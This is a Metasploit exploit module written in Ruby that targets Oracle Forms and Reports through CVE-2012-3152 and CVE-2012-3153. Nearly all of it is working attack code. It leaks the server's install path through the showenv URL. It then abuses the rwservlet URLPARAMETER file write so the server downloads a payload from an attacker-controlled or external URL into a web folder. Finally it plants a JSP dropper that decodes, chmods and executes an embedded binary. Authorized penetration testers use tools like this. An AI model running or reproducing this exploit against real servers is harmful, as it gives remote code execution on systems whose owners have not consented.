## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'uri' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE Rank = GreatRanking def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle Forms and Reports Remote Code Execution', 'Description' => %q{ This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution on the host. The showenv url can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1. }, 'Author' => [ 'miss_sudo ', # Vulnerability discovery 'Mekanismen ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-3152' ], [ 'CVE', '2012-3153' ], [ 'OSVDB', '86395' ], # Matches CVE-2012-3152 [ 'OSVDB', '86394' ], # Matches CVE-2012-3153 [ 'EDB', '31253' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2014-01-15', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ OptString.new('EXTURL', [false, 'An external host to request the payload from', '' ]), OptString.new('PAYDIR', [true, 'The folder to download the payload to', '/images/' ]), OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]), ] ) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/reports/rwservlet/showenv'), 'method' => 'GET' }) if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ vprint_good 'Windows install detected ' path = ::Regexp.last_match(1).gsub('\\', '/') vprint_status "Path: #{path}" elsif res.body =~ %r{/(.*)/showenv} vprint_good 'Linux install detected' vprint_status "Path: #{::Regexp.last_match(1)}" else return Exploit::CheckCode::Safe end end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/reports/rwservlet'), 'method' => 'GET', 'vars_get' => { 'report' => 'test.rdf', 'desformat' => 'html', 'destype' => 'cache', 'JOBTYPE' => 'rwurl', 'URLPARAMETER' => 'file:///' } }) if res and res.code == 200 and res.body.downcase.exclude?('') vprint_good 'URLPARAMETER is vulnerable' return Exploit::CheckCode::Vulnerable else vprint_status 'URLPARAMETER is not vulnerable' return Exploit::CheckCode::Safe end return Exploit::CheckCode::Safe end def exploit @payload_url = '' @payload_name = rand_text_alpha(rand(8..15)) + '.jsp' @payload_dir = datastore['PAYDIR'] @local_path = '' print_status 'Querying showenv!' res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/reports/rwservlet/showenv'), 'method' => 'GET' }) if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ print_good 'Query succeeded!' print_status 'Windows install detected ' @local_path = ::Regexp.last_match(1).gsub('\\', '/') print_status "Path: #{@local_path}" elsif res.body =~ %r{/(.*)/showenv} print_good 'Query succeeded!' print_status 'Linux install detected' @local_path = ::Regexp.last_match(1) print_status "Path: #{@local_path}" else print_error 'Query failed' fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end if datastore['EXTURL'].blank? print_status 'Hosting payload locally ...' begin Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error end exec_payload else print_status 'Using external url for payload delivery ...' @payload_url = datastore['EXTURL'] upload_payload exec_payload end end def primer @payload_url = get_uri @pl = gen_file_dropper upload_payload end def on_request_uri(cli, _request) send_response(cli, @pl) end def autofilter true end def upload_payload print_status 'Uploading payload ...' path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/reports/rwservlet'), 'method' => 'GET', 'encode_params' => false, 'vars_get' => { 'report' => 'test.rdf', 'desformat' => 'html', 'destype' => 'file', 'desname' => path, 'JOBTYPE' => 'rwurl', 'URLPARAMETER' => @payload_url } }) if res and res.code == 200 print_good 'Payload hopefully uploaded!' else print_error 'Payload upload failed' end end def gen_file_dropper big_payload = false # size matters :( gen_payload_name = rand_text_alpha(rand(8..15)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) print_status 'Building JSP shell ...' len = encoded_pl.length if len >= 60000 # java string size limit ~60k workaround print_status 'Adjusting shell due to payload size' pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true end # embed our payload shell = '<%@ page import="java.util.*,java.io.*, sun.misc.BASE64Decoder"%>' shell += ' <%' shell += ' BASE64Decoder decoder = new BASE64Decoder();' # correct file suffix if windows if datastore['TARGET'] == 1 shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".exe\");" else shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".tmp\");" end shell += ' String path = temp.getAbsolutePath();' if big_payload shell += " byte [] pl = decoder.decodeBuffer(\"#{pl_first}\");" shell += " byte [] pltwo = decoder.decodeBuffer(\"#{pl_second}\");" shell += ' BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));' shell += ' ou.write(pl);' shell += ' ou.close();' shell += ' ou = new BufferedOutputStream(new FileOutputStream(path, true));' shell += ' ou.write(pltwo);' shell += ' ou.close();' else shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");" shell += ' BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));' shell += ' ou.write(pl);' shell += ' ou.close();' end # correct rights if linux host if datastore['TARGET'] == 0 shell += ' Process p = Runtime.getRuntime().exec("/bin/chmod 700 " + path);' shell += ' p.waitFor();' end shell += ' Runtime.getRuntime().exec(path);' shell += '%>' return shell end def exec_payload print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") print_status('Executing payload...') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'reports', @payload_dir, @payload_name), 'method' => 'GET' }) if res and res.code == 200 print_good('Payload executed!') else print_error('Payload execution failed') end end end